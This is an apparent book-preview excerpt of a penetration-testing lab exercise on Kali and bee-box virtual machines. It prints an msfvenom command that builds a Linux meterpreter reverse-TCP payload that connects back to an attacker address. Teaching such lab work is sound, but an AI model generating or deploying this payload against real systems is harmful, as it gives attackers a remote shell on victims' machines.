August 2018
Intermediate to advanced
404 pages
10h 22m
English
For this exercise, have both the Kali and bee-box virtual machines running, then follow the next steps:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.10 LPORT=4443 -f elf > cute_dolphin.bin

This will create a file named cute_dolphin.bin, which is a reverse Linux meterpreter shell; reverse means that it will connect back to the attacking machine instead of listening for us to connect.
Read now
Unlock full access